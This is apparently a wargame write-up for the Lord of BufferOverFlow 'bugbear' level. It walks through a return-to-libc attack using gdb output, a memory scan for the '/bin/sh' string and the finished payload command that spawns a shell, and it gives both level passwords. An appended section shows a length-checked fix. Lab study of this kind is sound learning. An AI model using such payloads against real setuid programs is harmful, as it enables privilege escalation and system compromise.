[Lord Of BufferOverFlow] No. 13 darkknight -> bugbear

2021. 3. 1. 01:34·Write-Up/LOB(lord of bufferoverflow)

login : darkknight

password : new attacker

 

[darkknight@localhost darkknight]$ cat bugbear.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - bugbear
        - RTL1
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack betrayed you!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

This level is solved with the attack technique called RTL (return-to-libc).

The overall payload is:

data to fill the buffer up to the saved return address + address of system() + 4 dummy bytes (the return address system() would use) + address of the "/bin/sh" string

 

Let's find each one.

1. Address of system()

(gdb) disas main
Dump of assembler code for function main:
0x8048430 <main>:       push   %ebp
0x8048431 <main+1>:     mov    %esp,%ebp
0x8048433 <main+3>:     sub    $0x2c,%esp
0x8048436 <main+6>:     cmpl   $0x1,0x8(%ebp)
0x804843a <main+10>:    jg     0x8048453 <main+35>
0x804843c <main+12>:    push   $0x8048500
0x8048441 <main+17>:    call   0x8048350 <printf>
0x8048446 <main+22>:    add    $0x4,%esp
0x8048449 <main+25>:    push   $0x0
0x804844b <main+27>:    call   0x8048360 <exit>
0x8048450 <main+32>:    add    $0x4,%esp
0x8048453 <main+35>:    mov    0xc(%ebp),%eax
0x8048456 <main+38>:    add    $0x4,%eax
0x8048459 <main+41>:    mov    (%eax),%edx
0x804845b <main+43>:    add    $0x2f,%edx
0x804845e <main+46>:    cmpb   $0xbf,(%edx)
0x8048461 <main+49>:    jne    0x8048480 <main+80>
0x8048463 <main+51>:    push   $0x804850c
0x8048468 <main+56>:    call   0x8048350 <printf>
0x804846d <main+61>:    add    $0x4,%esp
0x8048470 <main+64>:    push   $0x0
0x8048472 <main+66>:    call   0x8048360 <exit>
---Type <return> to continue, or q <return> to quit---
0x8048477 <main+71>:    add    $0x4,%esp
0x804847a <main+74>:    lea    0x0(%esi),%esi
0x8048480 <main+80>:    mov    0xc(%ebp),%eax
0x8048483 <main+83>:    add    $0x4,%eax
0x8048486 <main+86>:    mov    (%eax),%edx
0x8048488 <main+88>:    push   %edx
0x8048489 <main+89>:    lea    0xffffffd8(%ebp),%eax
0x804848c <main+92>:    push   %eax
0x804848d <main+93>:    call   0x8048370 <strcpy>
0x8048492 <main+98>:    add    $0x8,%esp
0x8048495 <main+101>:   lea    0xffffffd8(%ebp),%eax
0x8048498 <main+104>:   push   %eax
0x8048499 <main+105>:   push   $0x8048522
0x804849e <main+110>:   call   0x8048350 <printf>
0x80484a3 <main+115>:   add    $0x8,%esp
0x80484a6 <main+118>:   leave
0x80484a7 <main+119>:   ret
0x80484a8 <main+120>:   nop
0x80484a9 <main+121>:   nop
0x80484aa <main+122>:   nop
0x80484ab <main+123>:   nop
0x80484ac <main+124>:   nop
0x80484ad <main+125>:   nop
---Type <return> to continue, or q <return> to quit---
0x80484ae <main+126>:   nop
0x80484af <main+127>:   nop
End of assembler dump.
(gdb) b *main
Breakpoint 1 at 0x8048430
(gdb) r
Starting program: /home/darkknight/test

Breakpoint 1, 0x8048430 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

 

2. Address of the "/bin/sh" string

#include <stdio.h>
#include <string.h>

int main(){
        /* Start scanning from the address of system() found in gdb */
        unsigned long addr = 0x40058ae0;

        /* Walk forward one byte at a time until the 8 bytes "/bin/sh\0" match */
        while (memcmp((void*)addr, "/bin/sh\x00", 8)){
                addr++;
        }
        printf("Address: %lx\n", addr);

        return 0;
}
[darkknight@localhost darkknight]$ vi getaddr.c
[darkknight@localhost darkknight]$ gcc -o getaddr getaddr.c
[darkknight@localhost darkknight]$ ./getaddr
Address: 400fbff9

 ./bugbear `python -c 'print "\x90"*44 + "\xe0\x8a\x05\x40" + "\x90"*4 + "\xf9\xbf\x0f\x40"'`
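The byte-47 check in bugbear.c only rejects a return address whose top byte is 0xbf (a stack address), which is why the libc addresses in the payload above pass straight through it. As an added example (not part of the original write-up or the LOB challenge), here is the same program with strcpy() replaced by a length-checked copy, beside a function mirroring the original filter so the two can be compared on the same over-long input; the function names are my own.

```c
#include <stdio.h>
#include <string.h>

#define BUFSIZE 40

/* Mirrors the original filter: reject only when byte 47 (the highest byte
 * of the overwritten return address) is 0xbf, i.e. a stack address.
 * A return into libc (0x40xxxxxx on this box) is not caught at all, and the
 * original even reads index 47 when the argument is shorter than that. */
static int original_filter_rejects(const char *arg, size_t len)
{
    return len > 47 && (unsigned char)arg[47] == 0xbf;
}

/* Hardened replacement for strcpy(): copy only if the argument, including
 * its terminating NUL, fits the destination; otherwise refuse.
 * Returns 0 on success, -1 when the input would overflow the buffer. */
static int copy_arg(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstlen)
        return -1;            /* would overflow: refuse rather than truncate silently */
    memcpy(dst, src, n + 1);  /* n + 1 <= dstlen, so the NUL fits too */
    return 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUFSIZE];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    /* No byte-value denylist: the overflow itself is what gets refused */
    if (copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        printf("argument too long\n");
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

The length check rejects every input of 40 bytes or more regardless of which address bytes it carries, so the RTL layout shown above never reaches the saved return address.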

 

bugbear password : new divide

 
